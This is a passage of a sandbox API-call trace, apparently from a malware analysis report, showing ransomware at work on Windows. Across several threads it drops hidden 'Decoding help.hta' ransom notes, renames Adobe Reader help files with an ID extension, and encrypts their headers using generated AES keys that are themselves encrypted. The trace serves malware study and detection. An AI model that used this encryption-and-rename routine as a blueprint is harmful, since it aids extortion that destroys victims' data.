Files\\Adobe\\HelpCfg\\ro_RO\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ro_ro\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb18 [0058.335] CreateFileMappingA (hFile=0xb18, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xb1c [0058.335] CryptAcquireContextA (in: phProv=0x23e0fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x23e0fcec*=0x2aac55e8) returned 1 [0060.201] CryptGenKey (in: hProv=0x2aac55e8, Algid=0x6610, dwFlags=0x1, phKey=0x23e0fce8 | out: phKey=0x23e0fce8*=0x5fca1e0) returned 1 [0060.201] CryptExportKey (in: hKey=0x5fca1e0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x23e0fbe4, pdwDataLen=0x23e0fce4 | out: pbData=0x23e0fbe4*, pdwDataLen=0x23e0fce4*=0x2c) returned 1 [0060.201] MapViewOfFile (hFileMappingObject=0xb1c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x39c0000 [0064.182] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x23e0fbe4*, pdwDataLen=0x23e0fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x23e0fbe4*, pdwDataLen=0x23e0fcf8*=0x100) returned 1 [0064.183] CryptEncrypt (in: hKey=0x5fca1e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x39c0000*, pdwDataLen=0x23e0fce4*=0x140, dwBufLen=0x140 | out: pbData=0x39c0000*, pdwDataLen=0x23e0fce4*=0x140) returned 1 [0064.183] UnmapViewOfFile (lpBaseAddress=0x39c0000) returned 1 [0064.185] CloseHandle (hObject=0xb1c) returned 1 [0064.185] CryptDestroyKey (hKey=0x5fca1e0) returned 1 [0064.185] CryptReleaseContext (hProv=0x2aac55e8, dwFlags=0x0) returned 1 [0064.185] SetFilePointerEx (in: hFile=0xb18, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.186] WriteFile (hFile=0xb18, lpBuffer=0x23e0fbe4, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x23e0fcf8, lpOverlapped=0x0) Thread: id = 810 os_tid = 0x89c [0054.550] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\*.*", lpFindFileData=0x23f4fd30 | out: lpFindFileData=0x23f4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a829930, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d0d0ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d0d0ef0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10a4b568 [0061.343] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.343] FindNextFileW (in: hFindFile=0x10a4b568, lpFindFileData=0x23f4fd30 | out: lpFindFileData=0x23f4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a829930, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d0d0ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d0d0ef0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.343] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0061.343] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.343] FindNextFileW (in: hFindFile=0x10a4b568, lpFindFileData=0x23f4fd30 | out: lpFindFileData=0x23f4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x682, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0061.343] lstrcpyW (in: lpString1=0x2a960ad8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\*.*" [0061.343] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\*.*") returned 70 [0061.343] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\Decoding help.hta" [0061.343] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\decoding help.hta")) returned 0xffffffff [0061.343] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe6c [0061.684] WriteFile (in: hFile=0xe6c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x23f4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x23f4fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.685] CloseHandle (hObject=0xe6c) returned 1 [0061.685] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 811 os_tid = 0x8ac [0054.550] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\*.*", lpFindFileData=0x2408fd30 | out: lpFindFileData=0x2408fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5f2920, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db838 [0056.845] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.845] FindNextFileW (in: hFindFile=0x5db838, lpFindFileData=0x2408fd30 | out: lpFindFileData=0x2408fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5f2920, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.845] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.845] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.845] FindNextFileW (in: hFindFile=0x5db838, lpFindFileData=0x2408fd30 | out: lpFindFileData=0x2408fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 1 [0056.845] lstrcpyW (in: lpString1=0x10fc4d88, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\*.*" [0056.845] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\*.*") returned 63 [0056.845] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\Decoding help.hta" [0056.845] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ru_ru\\decoding help.hta")) returned 0xffffffff [0056.845] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ru_ru\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0c [0058.330] WriteFile (in: hFile=0xb0c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2408fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2408fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.331] CloseHandle (hObject=0xb0c) returned 1 [0058.331] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.331] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Reader_10.0.helpcfg") returned -1 [0058.331] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0058.331] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\*.*" [0058.331] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\*.*") returned 63 [0058.331] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\", lpString2="Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\Reader_10.0.helpcfg" [0058.331] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\Reader_10.0.helpcfg" [0058.331] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\Reader_10.0.helpcfg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" [0058.331] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ru_ru\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ru_ru\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.332] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ru_RU\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ru_ru\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0c [0058.332] CreateFileMappingA (hFile=0xb0c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xb10 [0058.332] CryptAcquireContextA (in: phProv=0x2408fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2408fcec*=0x2aac5560) returned 1 [0060.201] CryptGenKey (in: hProv=0x2aac5560, Algid=0x6610, dwFlags=0x1, phKey=0x2408fce8 | out: phKey=0x2408fce8*=0x5fca1a0) returned 1 [0060.201] CryptExportKey (in: hKey=0x5fca1a0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2408fbe4, pdwDataLen=0x2408fce4 | out: pbData=0x2408fbe4*, pdwDataLen=0x2408fce4*=0x2c) returned 1 [0060.201] MapViewOfFile (hFileMappingObject=0xb10, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x39c0000 [0064.176] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2408fbe4*, pdwDataLen=0x2408fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x2408fbe4*, pdwDataLen=0x2408fcf8*=0x100) returned 1 [0064.176] CryptEncrypt (in: hKey=0x5fca1a0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x39c0000*, pdwDataLen=0x2408fce4*=0x140, dwBufLen=0x140 | out: pbData=0x39c0000*, pdwDataLen=0x2408fce4*=0x140) returned 1 [0064.177] UnmapViewOfFile (lpBaseAddress=0x39c0000) returned 1 [0064.179] CloseHandle (hObject=0xb10) returned 1 [0064.179] CryptDestroyKey (hKey=0x5fca1a0) returned 1 [0064.179] CryptReleaseContext (hProv=0x2aac5560, dwFlags=0x0) returned 1 [0064.179] SetFilePointerEx (in: hFile=0xb0c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.179] WriteFile (hFile=0xb0c, lpBuffer=0x2408fbe4, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2408fcf8, lpOverlapped=0x0) Thread: id = 812 os_tid = 0x8bc [0054.550] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\*.*", lpFindFileData=0x241cfd30 | out: lpFindFileData=0x241cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a84fa90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d0d0ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d0d0ef0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbbed8 [0062.547] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.547] FindNextFileW (in: hFindFile=0x10fbbed8, lpFindFileData=0x241cfd30 | out: lpFindFileData=0x241cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a84fa90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d0d0ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d0d0ef0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.547] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0062.547] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.547] FindNextFileW (in: hFindFile=0x10fbbed8, lpFindFileData=0x241cfd30 | out: lpFindFileData=0x241cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x58f, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 Thread: id = 813 os_tid = 0x8c0 [0054.550] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\*.*", lpFindFileData=0x2430fd30 | out: lpFindFileData=0x2430fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5f2920, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da3b8 [0056.844] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.844] FindNextFileW (in: hFindFile=0x5da3b8, lpFindFileData=0x2430fd30 | out: lpFindFileData=0x2430fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5f2920, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.844] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.844] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.844] FindNextFileW (in: hFindFile=0x5da3b8, lpFindFileData=0x2430fd30 | out: lpFindFileData=0x2430fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 1 [0056.844] lstrcpyW (in: lpString1=0x10fbcd80, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\*.*" [0056.844] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\*.*") returned 63 [0056.844] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\Decoding help.hta" [0056.844] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sk_sk\\decoding help.hta")) returned 0xffffffff [0056.844] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sk_sk\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb00 [0058.327] WriteFile (in: hFile=0xb00, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2430fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2430fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.328] CloseHandle (hObject=0xb00) returned 1 [0058.328] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.328] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Reader_10.0.helpcfg") returned -1 [0058.328] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0058.328] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\*.*" [0058.328] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\*.*") returned 63 [0058.328] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\", lpString2="Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\Reader_10.0.helpcfg" [0058.328] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\Reader_10.0.helpcfg" [0058.328] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\Reader_10.0.helpcfg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" [0058.328] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sk_sk\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sk_sk\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.329] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sk_sk\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb00 [0058.329] CreateFileMappingA (hFile=0xb00, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xb04 [0058.329] CryptAcquireContextA (in: phProv=0x2430fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2430fcec*=0x2aac54d8) returned 1 [0060.200] CryptGenKey (in: hProv=0x2aac54d8, Algid=0x6610, dwFlags=0x1, phKey=0x2430fce8 | out: phKey=0x2430fce8*=0x5fca160) returned 1 [0060.200] CryptExportKey (in: hKey=0x5fca160, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2430fbe4, pdwDataLen=0x2430fce4 | out: pbData=0x2430fbe4*, pdwDataLen=0x2430fce4*=0x2c) returned 1 [0060.200] MapViewOfFile (hFileMappingObject=0xb04, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x39c0000 [0064.170] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2430fbe4*, pdwDataLen=0x2430fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x2430fbe4*, pdwDataLen=0x2430fcf8*=0x100) returned 1 [0064.170] CryptEncrypt (in: hKey=0x5fca160, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x39c0000*, pdwDataLen=0x2430fce4*=0x140, dwBufLen=0x140 | out: pbData=0x39c0000*, pdwDataLen=0x2430fce4*=0x140) returned 1 [0064.170] UnmapViewOfFile (lpBaseAddress=0x39c0000) returned 1 [0064.172] CloseHandle (hObject=0xb04) returned 1 [0064.173] CryptDestroyKey (hKey=0x5fca160) returned 1 [0064.173] CryptReleaseContext (hProv=0x2aac54d8, dwFlags=0x0) returned 1 [0064.173] SetFilePointerEx (in: hFile=0xb00, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.173] WriteFile (hFile=0xb00, lpBuffer=0x2430fbe4, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2430fcf8, lpOverlapped=0x0) Thread: id = 814 os_tid = 0x908 [0054.550] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\*.*", lpFindFileData=0x2444fd30 | out: lpFindFileData=0x2444fd30*(dwFileAttributes=0x10, 